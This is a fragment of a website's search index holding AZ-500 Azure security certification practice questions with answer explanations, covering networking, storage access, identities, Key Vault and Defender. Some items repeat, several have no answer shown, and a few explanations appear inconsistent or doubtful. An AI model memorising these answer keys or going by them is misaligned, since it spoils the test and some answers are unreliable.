Service endpoints route traffic over the Azure backbone and allow access to the entire service, for example, all Microsoft SQL servers or the storage accounts of all customers. Private endpoints provide access to a specific instance. A subnet by itself does not provide isolation or route traffic to the Azure backbone. A VPN gateway does not provide traffic isolation for all resources.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-15","title":"Question 15","text":"

                            You have an Azure subscription that contains a virtual network named VNet1. VNet1 contains the following subnets:

                            • Subnet1: Has a connected virtual machine
                            • Subnet2: Has a\u00a0Microsoft.Storage\u00a0service endpoint
                            • Subnet3: Has subnet delegation to the\u00a0Microsoft.Web/serverFarms\u00a0service
• Subnet4: Has no additional configurations

                            You need to deploy an Azure SQL managed instance named managed1 to VNet1. To which subnets can you connect managed1?

• Subnet2 and Subnet4 only
• Subnet2, Subnet3, and Subnet4 only
• Subnet1, Subnet2, Subnet3, and Subnet4
                            See response

Azure SQL Managed Instance requires a dedicated subnet with no other resources or virtual machines connected to it, because managed instances have specific networking and isolation requirements; sharing a subnet with other resources, such as the virtual machine in Subnet1, could lead to conflicts in network configuration. The subnet can have a service endpoint or can be delegated to a different service. For this scenario, you can deploy managed1 to Subnet2, Subnet3, and Subnet4 only. You cannot deploy managed1 to Subnet1 because Subnet1 has a connected virtual machine.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-16","title":"Question 16","text":"

                            You host a web app on an Azure virtual machine. Users access the app through a public load balancer. You need to offload SSL traffic to the web app at the edge. What should you do?

                            • Configure Traffic Manager.
                            • Configure Azure Application Gateway.
                            • Configure Azure Front Door and switch access to the app via an internal load balancer.
                            • Configure Azure Firewall.
                            See response

Front Door allows for SSL offloading at the edge and can route traffic to an internal load balancer. Traffic Manager does not perform SSL offloading. Neither Azure Firewall nor an Application Gateway can be deployed at the edge. While Azure Application Gateway is a Layer 7 load balancer that can provide SSL termination and load balancing for web applications, it is not positioned at the network edge like Azure Front Door; it is typically used to route traffic within a virtual network to backend services and does not provide the same global load balancing and edge routing capabilities.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-17","title":"Question 17","text":"

                            You have an Azure subscription that contains a virtual network named VNet1. You plan to deploy an Azure App Service web app named Web1. You need to be able to deploy Web1 to the subnet of VNet1. The solution must minimize costs. Which pricing plan should you use for Web1?

                            • Basic
                            • Shared
                            • Isolated
                            • Premium
                            See response

                            Only the Isolated pricing plan (tier) can be deployed to a virtual network subnet. With other pricing plans, inbound traffic is always routed to the public IP address of the web app, while web app outbound traffic can reach the endpoints on a virtual network.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-18","title":"Question 18","text":"

                            You have a data connector for Microsoft Sentinel. You need to configure the connector to collect logs from Conditional Access in Azure AD. Which log should you connect to Microsoft Sentinel?

                            • Sign-in logs
                            • Audit logs
                            • Activity logs
                            • Provisioning logs
                            See response

                            Sign-in logs include information about sign-ins and how resources are used by your users. Audit logs include information about changes applied to your tenant, such as user and group management or updates applied to your tenant\u2019s resources. Activity logs include subscription-level events, not tenant-level activity. Provisioning logs include activities performed by the provisioning service, such as the creation of a group in ServiceNow or a user imported from Workday.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-19","title":"Question 19","text":"

                            You have an Azure Storage account. You plan to prevent the use of shared keys by using Azure Policy. Which two access methods will continue to work? Each correct answer presents a complete solution. Select all answers that apply.

• account SAS
                            • service SAS
                            • Storage Blob Data Reader role
                            • user delegation
                            See response

                            user delegation and Storage Blob Data Reader role.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-20","title":"Question 20","text":"

                            You have an Azure SQL Database server. You enable Azure AD authentication for Azure SQL. You need to prevent other authentication methods from being used. Which command should you run? Select only one answer.

                            • az sql mi ad-admin create
                            • az sql mi ad-only-auth enable
                            • az sql server ad-admin create
                            • az sql server ad-only-auth enable
                            See response

az sql server ad-only-auth enable enables authentication only through Azure AD. az sql server ad-admin create and az sql mi ad-admin create do not stop other authentication methods. az sql mi ad-only-auth enable enables Azure AD-only authentication for Azure SQL Managed Instance, not for an Azure SQL Database server.
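A minimal sketch of the correct command; the resource group RG1 and server name sqlserver1 are placeholders:

az sql server ad-only-auth enable --resource-group RG1 --name sqlserver1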

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-21","title":"Question 21","text":"

                            You have an application that securely shares files hosted in Azure Blob storage to external users by using an account SAS. One of the SAS tokens is compromised. How should you stop the compromised SAS token from being used? Select only one answer.

                            • Regenerate the storage account access keys.
                            • Set the Allow public anonymous access to setting for the storage account.
                            • Set the Secure transfer required property for the storage account.
                            • Switch to managed identities.
                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-22","title":"Question 22","text":"

You have an Azure AD tenant. Users have both Windows and non-Windows devices. All users have smartphones. You plan to implement Azure AD Multi-Factor Authentication (MFA). You need to ensure that Azure MFA is used to authenticate users to Azure resources. The solution must be implemented without any additional cost. Which three Azure MFA methods should you implement? Each correct answer presents a complete solution. Select all answers that apply.

                            • FIDO2 security keys
                            • OATH software tokens
                            • SMS verification
                            • the Microsoft Authenticator app
                            • voice call verification
                            • Windows Hello for Business
                            See response

                            SMS verification, The Microsoft Authenticator app, and voice call verification.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-23","title":"Question 23","text":"

                            You are managing permission scopes for an Azure AD app registration. What are three OpenID Connect scopes that you can use? Each correct answer presents a complete solution. Select all answers that apply.

                            • address
                            • email
                            • offline_access
                            • openID
                            • phone
                            See response

                            email, openID, offline_access.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-24","title":"Question 24","text":"

                            You have an Azure subscription that contains a user named Admin1. You need to ensure that Admin1 can access the Regulatory compliance dashboard in Microsoft Defender for Cloud. The solution must follow the principle of least privilege. Which two roles should you assign to Admin1? Each correct answer presents part of the solution. Select all answers that apply.

                            • Global Reader
                            • Resource Policy Contributor
                            • Security Admin
                            • Security Reader
                            See response

                            To use the Regulatory compliance dashboard in Defender for Cloud, you must have sufficient permissions. At a minimum, you must be assigned the Resource Policy Contributor and Security Admin roles.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-25","title":"Question 25","text":"

                            Your company has a multi-cloud online environment. You plan to use Microsoft Defender for Cloud to protect all supported online environments. Which three environments support Defender for Cloud? Each correct answer presents a complete solution. Select all answers that apply.

                            • Alibaba Cloud
                            • Amazon Web Services (AWS)
                            • Azure DevOps
                            • GitHub
                            • Oracle Cloud
                            See response

                            Defender for Cloud protects workloads in Azure, AWS, GitHub, and Azure DevOps. Oracle Cloud and Alibaba Cloud are unsupported by Defender for Cloud.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-26","title":"Question 26","text":"

                            You have Azure SQL databases that contain credit card information. You need to identify and label columns that contain credit card numbers. Which Microsoft Defender for Cloud feature should you use? Select only one answer.

                            • hash reputation analysis
                            • inventory filters
                            • SQL information protection
                            • SQL Servers on machines
                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-27","title":"Question 27","text":"

                            You configure Microsoft Sentinel to connect to different data sources. You are unable to configure a connector that uses an Azure Functions API connection. Which permissions should you change? Select only one answer.

                            • read and write permissions for Azure Functions
                            • read and write permissions for the workspaces used by Microsoft Sentinel
                            • read permissions for Azure Functions
                            • read permissions for the workspaces used by Microsoft Sentinel
                            See response

You need read and write permissions for Azure Functions to configure a connector that uses an Azure Functions API connection. You were able to add other connectors, which proves that you have access to the workspace. Read permissions for the workspaces used by Microsoft Sentinel allow you to read data in Microsoft Sentinel. Read permissions for Azure Functions allow you to run functions, not create them.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-28","title":"Question 28","text":"

                            You are configuring retention for Azure activity logs in Azure Monitor logs. The retention period for the Azure Monitor logs is set to 30 days. You need to meet the following compliance requirements:

                            • Store the Azure activity logs for 90 days.
                            • Encrypt the logs by using your own encryption keys.
                            • Use the most cost-efficient storage solution for the logs.

                            What should you do? Select only one answer.

                            • Configure a workspace retention policy.
                            • Configure diagnostic settings and send the logs to Azure Event Hubs Standard.
                            • Configure diagnostic settings and send the logs to Azure Storage.
                            • Leave the default settings as they are.
                            See response

                            Configuring diagnostic settings and sending the logs to Azure Storage meets both the retention time and encryption requirements. Activity log data type is kept for 90 days by default, but the logs are stored by using Microsoft-managed keys. Configuring a workspace retention policy is not the most cost-efficient solution for this. Event Hubs is a real-time event stream engine and is not designed to be used instead of a database or as a permanent store for indefinitely held event streams.
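As a hedged sketch of the correct option, activity logs can be exported at the subscription scope to a storage account (which can itself be configured with customer-managed keys); the setting name, region, storage account ID, and log categories below are placeholders, and flag names can vary between Azure CLI versions:

az monitor diagnostic-settings subscription create \
  --name ExportActivityLog \
  --location westus \
  --storage-account /subscriptions/<subscription-id>/resourceGroups/RG1/providers/Microsoft.Storage/storageAccounts/storage1 \
  --logs '[{"category": "Administrative", "enabled": true}]'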

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-29","title":"Question 29","text":"

                            You need to implement a key management solution that supports importing keys generated in an on-premises environment. The solution must ensure that the keys stay within a single Azure region. What should you do? Select only one answer.

                            • Apply the Keys should be the specified cryptographic type RSA or EC Azure policy.
                            • Disable the Allow trusted services option.
                            • Implement Azure Key Vault Firewall.
                            • Implement Azure Key Vault Managed HSM.
                            See response

Key Vault Managed HSM supports importing keys generated in an on-premises HSM. Also, a managed HSM does not store or process customer data outside the Azure region in which the customer deploys the HSM instance. Implementing Key Vault Firewall does not address where keys are generated or kept, so on-premises-generated keys would still have to be managed. Enforcing HSM-backed keys through policy does not enforce that they are imported. Disabling the Allow trusted services option has no direct impact on key importing.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-30","title":"Question 30","text":"

                            You have an Azure subscription that contains the following resources:

                            • A virtual machine named VM1 that has a network interface named NIC1
                            • A virtual network named VNet1 that has a subnet named Subnet1
                            • A public IP address named PubIP1
                            • A load balancer named LB1

                            You create a network security group (NSG) named NSG1. To which two resources can you associate NSG1? Each correct answer presents a complete solution. Select all answers that apply.

                            • LB1
                            • NIC1
                            • PubIP1
                            • Subnet1
                            • VM1
                            • VNet1
                            See response

                            You can associate an NSG to a virtual network subnet and network interface only. You can associate zero or one NSGs to each virtual network subnet and network interface on a virtual machine. The same NSG can be associated to as many subnets and network interfaces as you choose.
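As a minimal sketch, NSG1 can be associated with the subnet and the network interface through the Azure CLI; the resource group RG1 is a placeholder:

az network vnet subnet update --resource-group RG1 --vnet-name VNet1 --name Subnet1 --network-security-group NSG1
az network nic update --resource-group RG1 --name NIC1 --network-security-group NSG1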

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-31","title":"Question 31","text":"

                            You have an Azure subscription that contains the following resources:

• A web app named WebApp1 in the West US Azure region
                            • A virtual network named VNet1 in the West US 3 Azure region

                            You need to integrate WebApp1 with VNet1. What should you implement first? Select only one answer.

                            • a service endpoint
                            • a VPN gateway
• Azure Front Door
                            • peering
                            See response

                            WebApp1 and VNet1 are in different regions and cannot use regional integration; you can use only gateway-required virtual network integration. To be able to implement this type of integration, you must first deploy a virtual network gateway in VNet1.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-32","title":"Question 32","text":"

                            You host a web app on an Azure virtual machine. Users access the app through a public load balancer. You need to offload SSL traffic to the web app at the edge. What should you do? Select only one answer.

                            • Configure an Azure firewall and switch access to the app via an internal load balancer.
                            • Configure Azure Application Gateway.
                            • Configure Azure Front Door and switch access to the app via an internal load balancer.
                            • Configure Azure Traffic Manager with performance traffic routing.
                            See response

Front Door allows for SSL offloading at the edge and can route traffic to an internal load balancer. Traffic Manager does not perform SSL offloading. Neither Azure Firewall nor an Application Gateway can be deployed at the edge.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-33","title":"Question 33","text":"

                            You have an Azure App Service web app named App1. You need to configure network controls for App1. App1 must only allow user access through Azure Front Door. Which two components should you implement? Each correct answer presents part of the solution. Select all answers that apply.

                            • access restrictions based on service tag
                            • access restrictions based on the IP address of Azure Front Door
                            • application security groups
                            • header filters
                            See response

                            Traffic from Front Door to the app originates from a well-known set of IP ranges defined in the\u00a0AzureFrontDoor.Backend\u00a0service tag. This includes every Front Door. To ensure traffic only originates from your specific instance, you will need to further filter the incoming requests based on the unique HTTP header that Front Door sends.
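As a hedged sketch, both restrictions can be expressed as a single App Service access-restriction rule that combines the Front Door service tag with the X-Azure-FDID header of your specific instance; the resource names and header value are placeholders, and the exact flag names may vary between Azure CLI versions:

az webapp config access-restriction add \
  --resource-group RG1 \
  --name App1 \
  --rule-name AllowFrontDoor \
  --action Allow \
  --priority 100 \
  --service-tag AzureFrontDoor.Backend \
  --http-header x-azure-fdid=<your-front-door-id>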

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-34","title":"Question 34","text":"

                            You have an Azure SQL database, an Azure key vault, and an Azure App Service web app. You plan to encrypt SQL data at rest by using Bring Your Own Key (BYOK). You need to create a managed identity to authenticate without storing any credentials in the code. The managed identity must share the lifecycle with the Azure resource it is used for. What should you implement?

                            • a system-assigned managed identity for an Azure SQL logical server
                            • a system-assigned managed identity for an Azure web app
                            • a system-assigned managed identity for Azure Key Vault
                            • a user-assigned managed identity
                            See response

To clarify, the managed identity is not set at the Azure SQL logical server level. The correct answer is a system-assigned managed identity for the Azure web app: it shares its lifecycle with the web app and is used to access the encryption keys in Azure Key Vault, enabling SQL data-at-rest encryption without storing any credentials in code.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-35","title":"Question 35","text":"

                            You need to provide an administrator with the ability to manage custom RBAC roles. The solution must follow the principle of least privilege. Which role should you assign to the administrator?

                            • Owner
                            • Contributor
                            • User Access Administrator
                            • Privileged Role Administrator
                            See response

                            User Access Administrator is the least privileged role that grants access to\u00a0Microsoft.Authorization/roleDefinition/write. Assigning the Owner role does not follow the principle of least privilege. Contributor does not have access to\u00a0Microsoft.Authorization/roleDefinition/write. Privileged Role Administrator grants access to manage role assignments in Azure AD, and all aspects of Azure AD Privileged Identity Management (PIM). This is not an RBAC role.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-36","title":"Question 36","text":"

                            You have a storage account that contains multiple containers, blobs, queues, and tables. You need to create a key to allow an application to access only data from a given table in the storage account. Which authentication method should you use for the application?

                            • SAS
                            • service SAS
                            • User delegation
• shared key access
                            See response

A service SAS is the only type of authentication that provides control at the table level. A user delegation SAS is available only for Blob storage. An account SAS and shared key access allow access to the entire storage account.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-37","title":"Question 37","text":"

                            You have an Azure Storage account. You plan to prevent the use of shared keys by using Azure Policy. Which two access methods will continue to work? Each correct answer presents a complete solution.

                            • Storage Blob Data Reader role
                            • service SAS
                            • user delegation
                            • account SAS
                            See response

The Storage Blob Data Reader role uses Azure AD to authenticate. A user delegation SAS is generated by using Azure AD. Both methods work whether shared keys are allowed or prevented. A service SAS and an account SAS are generated by using shared keys.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-38","title":"Question 38","text":"

                            You enable Always Encrypted for an Azure SQL database. Which scenario is supported?

                            • encrypting existing data
                            See response

                            Encrypting existing data is supported. Always Encrypted uses the client driver to encrypt and decrypt data. This means that some actions that only occur on the server side will not work.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-39","title":"Question 39","text":"

                            You are evaluating the Azure Policy configurations to identify any required custom initiatives and policies. You need to run workloads in Azure that are compliant with the following regulations:

                            • FedRAMP High
                            • PCI DSS 3.2.1
                            • GDPR
                            • ISO 27001:2013

                            For which regulation should you create custom initiatives?

                            • FedRAMP High
                            • PCI DSS 3.2.1
                            • GDPR
                            • ISO 27001:2013
                            See response

To run workloads that are compliant with GDPR, custom initiatives must be created; GDPR compliance initiatives are not yet available in Azure. Azure has existing built-in initiatives for ISO 27001:2013, PCI DSS 3.2.1, and FedRAMP High.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-40","title":"Question 40","text":"

                            You have a workload in Azure that uses multiple virtual machines and Azure functions to access data in a storage account. You need to ensure that all access to the storage account is done by using a single identity. The solution must reduce the overhead of managing the identity. Which type of identity should you use? Select only one answer.

                            • group
                            • system-assigned managed identity
                            • user
                            • user-assigned managed identity
                            See response

A user-assigned managed identity can be shared across Azure resources, and its credentials are rotated by Azure. A user account requires manual password changes. You cannot use a group as a service principal. A system-assigned managed identity cannot be shared across multiple Azure resources.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-41","title":"Question 41","text":"

                            You have a workload in Azure that uses a virtual machine named VM1. VM1 is in a resource group named RG1. You need to create and assign an identity to VM1 that will be used to access Azure resources. Other virtual machines must be able to use the same identity. Which PowerShell script should you run? Select only one answer.

                            • New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VM1\"
                            • New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VMID\"
                            • $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType SystemAssigned
                            • $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType SystemAssignedUserAssigned
                            See response

The correct script creates a user-assigned managed identity, which can be shared across virtual machines, and then assigns it to VM1:

New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID
$vm = Get-AzVM -ResourceGroupName RG1 -Name VM1
Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VMID\"

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-42","title":"Question 42","text":"

                            You have an Azure subscription that contains an Azure Kubernetes Service (AKS) cluster named AKS1 and a user named User1. You need to ensure that User1 has access to AKS1 secrets. The solution must follow the principle of least privilege. Which role should you assign to User1? Select only one answer.

                            • Azure Kubernetes Service RBAC Admin
                            • Azure Kubernetes Service RBAC Cluster Admin
                            • Azure Kubernetes Service RBAC Reader
                            • Azure Kubernetes Service RBAC Writer
                            See response

                            Azure Kubernetes Service RBAC Writer has access to secrets. Azure Kubernetes Service RBAC Reader does not have access to secrets. Azure Kubernetes Service RBAC Cluster Admin and Azure Kubernetes Service RBAC Admin do not follow the principle of least privilege.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-43","title":"Question 43","text":"

                            You have an Azure subscription that contains an Azure container registry named CR1. You use Azure CLI to authenticate to the subscription. You need to authenticate to CR1 by using Azure CLI. Which command should you run? Select only one answer.

                            • az acr config
                            • az acr credential
                            • az acr login
                            • docker login
                            See response

                            The\u00a0az acr login\u00a0command is needed to authenticate to an Azure container registry from the Azure CLI. Docker login is used to sign in to a Docker repository.\u00a0az acr config\u00a0is used for configuring Azure Container Registry.\u00a0az acr credential\u00a0is used for managing login credentials for Azure Container Registry.
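A minimal usage sketch; the registry name CR1 comes from the question, while the image tag is a placeholder:

az acr login --name CR1
docker push cr1.azurecr.io/app:v1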

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-44","title":"Question 44","text":"

                            You have an Azure AD tenant that syncs with the on-premises Active Directory Domain Service (AD DS) domain and uses Azure Active Directory Domain Services (Azure AD DS). You have an application that runs on user devices by using the credentials of the signed-in user The application accesses data in Azure Files by using REST calls. You need to configure authentication for the application in Azure Files by using the most secure authentication method. Which authentication method should you use? Select only one answer.

                            • Azure AD
                            • SAS
                            • shared key
                            • on-premises Active Directory Domain Service (AD DS)
                            See response

                            A SAS is the most secure way to access Azure Files by using REST calls. A shared key allows any user with the key to access data. Azure AD and Active Directory Domain Service (AD DS) are unsupported for REST calls.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-45","title":"Question 45","text":"

                            You have an Azure SQL Database server. You enable Azure AD authentication for Azure SQL. You need to prevent other authentication methods from being used. Which command should you run? Select only one answer.

                            • az sql mi ad-admin create
                            • az sql mi ad-only-auth enable
                            • az sql server ad-admin create
                            • az sql server ad-only-auth enable
                            See response

                            az sql server ad-only-auth enable

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-46","title":"Question 46","text":"

**You are configuring an Azure Policy in your environment. You need to ensure that any resources that are missing a tag named CostCenter inherit a value from a resource group. You create a custom policy that uses the following snippet.**

                            \"policyRule\": {\n    \"if\": {\n        \"field\": \"tags['CostCenter']\",\n        \"exists\": \"false\"\n    },\n    \"then\": {\n        \"effect\": \"modify\",\n        \"details\": {\n            \"roleDefinitionIds\": [\n                \"/providers/microsoft.authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c\"\n            ],\n            \"operations\": [{\n                \"operation\": \"addOrReplace \",\n                \"field\": \"tags['CostCenter']\",\n                \"value\": \"[resourcegroup().tags['CostCenter']]\"\n            }]\n        }\n    }\n}\n

                            Which policy mode should you use? Select only one answer.

                            • all
                            • Append
                            • DeployIfNotExists
                            • indexed
                            See response

Indexed. The indexed policy mode evaluates only resource types that support tags and location, so the policy does not flag resources that cannot hold a CostCenter tag.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-47","title":"Question 47","text":"

                            You set Periodic recurring scans to\u00a0ON\u00a0while implementing a Microsoft Defender for SQL vulnerability assessment. How often will the scan be triggered? Select only one answer.

                            • at a recurrence that you configure
                            • once a day
                            • once a month
                            • once a week
                            See response

                            Once a week.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-48","title":"Question 48","text":"

                            You are implementing Microsoft Defender for SQL vulnerability assessments. In which two locations can users view the results? Each correct answer presents a complete solution. Select all answers that apply.

                            • an Azure Blob storage account
                            • an Azure Event Grid instance
                            • Microsoft Defender for Cloud
                            • Microsoft Teams
                            See response

                            Defender for Cloud is the default and mandatory location to view the results, while a Blob storage account is a mandatory destination and a prerequisite for enabling the scan. The Teams option is unavailable out of the box. A scan completion event is not sent to Event Grid.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-49","title":"Question 49","text":"

                            You are collecting Azure activity logs to Azure Monitor. The retention period for Azure Monitor logs is set to 30 days. To meet compliance requirements, you need to send a copy of the Azure activity logs to your SOC partner. What should you do? Select only one answer.

                            • Configure a workspace retention policy.
                            • Configure diagnostic settings and send the logs to Azure Event Hubs.
                            • Configure diagnostic settings and send the logs to Azure Storage.
                            • Install the Microsoft Sentinel security information and event management (SIEM) connector.
                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-50","title":"Question 50","text":"

                            You are designing an Azure solution that stores encrypted data in Azure Storage. You need to ensure that the keys used to encrypt the data cannot be permanently deleted until 60 days after they are deleted. The solution must minimize costs. What should you do? Select only one answer.

                            • Store keys in an HSM-protected key vault that has soft delete and purge protection enabled.
                            • Store keys in an HSM-protected key vault that has soft delete enabled.
                            • Store keys in a software-protected key vault that has soft delete and purge protection enabled.
                            • Store keys in a software-protected key vault that has soft delete enabled and purge protection disabled.
                            See response

                            Store keys in a software-protected key vault that has soft delete and purge protection enabled.
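A minimal Az PowerShell sketch of that configuration, assuming hypothetical vault, resource group, and region names; soft delete is enabled by default on new vaults, so only the retention period and purge protection need to be set explicitly.

# Sketch: software-protected (standard SKU) vault with a 60-day retention
# window and purge protection, so keys cannot be purged before it elapses.
New-AzKeyVault `
    -Name "kv-contoso-demo" `
    -ResourceGroupName "RG1" `
    -Location "eastus" `
    -SoftDeleteRetentionInDays 60 `
    -EnablePurgeProtection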

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-51","title":"Question 51","text":"

You plan to provide connectivity between Azure and your company's datacenter. You need to define how to establish the connection. The solution must meet the following requirements:

                            • All traffic between the datacenter and Azure must be encrypted.
                            • Bandwidth must be between 10 and 100 Gbps.

                            What should you use for the connection? Select only one answer.

                            • Azure VPN Gateway
                            • ExpressRoute Direct
                            • ExpressRoute with a provider
                            • VPN Gateway with Azure Virtual WAN
                            See response

                            ExpressRoute Direct

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-52","title":"Question 52","text":"

                            You are operating in a cloud-only environment. Users have computers that run either Windows 10 or 11. The users are located across the globe. You need to secure access to a point-to-site (P2S) VPN by using multi-factor authentication (MFA). Which authentication method should you implement? Select only one answer.

                            • Authenticate by using Active Directory Domain Services (AD DS).
                            • Authenticate by using native Azure AD authentication.
                            • Authenticate by using native Azure certificate-based authentication.
                            • Authenticate by using RADIUS.
                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-53","title":"Question 53","text":"

                            You have an Azure subscription that contains the following resources:

                            • Two virtual networks
                              • VNet1: Contains two subnets
                              • VNet2: Contains three subnets
                            • Virtual machines: Connected to all the subnets on VNet1 and VNet2
                            • A storage account named storage1

                            You need to identify the minimal number of service endpoints that are required to meet the following requirements:

                            • Virtual machines that are connected to the subnets of VNet1 must be able to access storage1 over the Azure backbone.
                            • Virtual machines that are connected to the subnets of VNet2 must be able to access Azure AD over the Azure backbone.

**How many service endpoints should you recommend? Select only one answer.**

                            • 2
                            • 3
                            • 4
                            • 5
                            See response

A service endpoint is configured for a specific service at the subnet level. Based on the requirements, you need to configure two service endpoints for Microsoft.Storage on VNet1 because VNet1 has two subnets, and three service endpoints for Microsoft.AzureActiveDirectory on VNet2 because VNet2 has three subnets. The minimum number of service endpoints that you must configure is five.
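As a reference for how a single endpoint is configured, here is a hedged sketch with hypothetical names; the same call is repeated per subnet and per service to reach the five endpoints.

# Sketch: add a Microsoft.Storage service endpoint to one subnet of VNet1,
# then persist the change to the virtual network.
$vnet = Get-AzVirtualNetwork -Name "VNet1" -ResourceGroupName "RG1"
Set-AzVirtualNetworkSubnetConfig `
    -Name "Subnet1" `
    -VirtualNetwork $vnet `
    -AddressPrefix "10.0.1.0/24" `
    -ServiceEndpoint "Microsoft.Storage"
$vnet | Set-AzVirtualNetwork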

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-54","title":"Question 54","text":"

                            You have an Azure subscription that contains a virtual network named VNet1. VNet1 contains the following subnets:

                            • Subnet1: Has a connected virtual machine
• Subnet2: Has a Microsoft.Storage service endpoint
• Subnet3: Has subnet delegation to the Microsoft.Web/serverFarms service
• Subnet4: Has no additional configurations

                            You need to deploy an Azure SQL managed instance named managed1 to VNet1. To which subnets can you connect managed1? Select only one answer.

                            • Subnet4 only
                            • Subnet3 and Subnet4 only
                            • Subnet2 and Subnet4 only
                            • Subnet2, Subnet3, and Subnet4 only
                            • Subnet1, Subnet2, Subnet3, and Subnet4
                            See response

You can deploy a SQL managed instance to a dedicated virtual network subnet that has no connected resources. The subnet can have a service endpoint or can be delegated to a different service. For this scenario, you can deploy managed1 to Subnet2, Subnet3, and Subnet4 only. You cannot deploy managed1 to Subnet1 because Subnet1 has a connected virtual machine.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-55","title":"Question 55","text":"

You use Azure Blueprints to deploy resources to a resource group named RG1. After the deployment, you try to add a disk to a virtual machine created by using Blueprints, but you get an access denied error. You open RG1 and check your access. You notice that you are listed as part of the Virtual Machine Contributor role for RG1, and there are no deny assignments or classic administrators in the resource group scope. Why are you unable to manage the virtual machine? Select only one answer.

                            • Blueprints created a deny assignment for the virtual machine resource.
                            • Blueprints removed the user from the Classic Administrator role.
                            • You must be part of the Disk Pool Operator role.
                            • You must be part of the Virtual Machine Administrator Login role.
                            See response

                            Blueprints must have created a deny assignment at the resource level. The Disk Pool Operator role allows users to provide permissions to the StoragePool resource provider, and the Virtual Machine Administrator Login role allows users to view the virtual machine in the portal and sign in as an administrator. You still have the Contributor role and should be able to manage a virtual machine unless a deny assignment is in place.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-56","title":"Question 56","text":"

                            You create an Azure policy by using the following snippet.

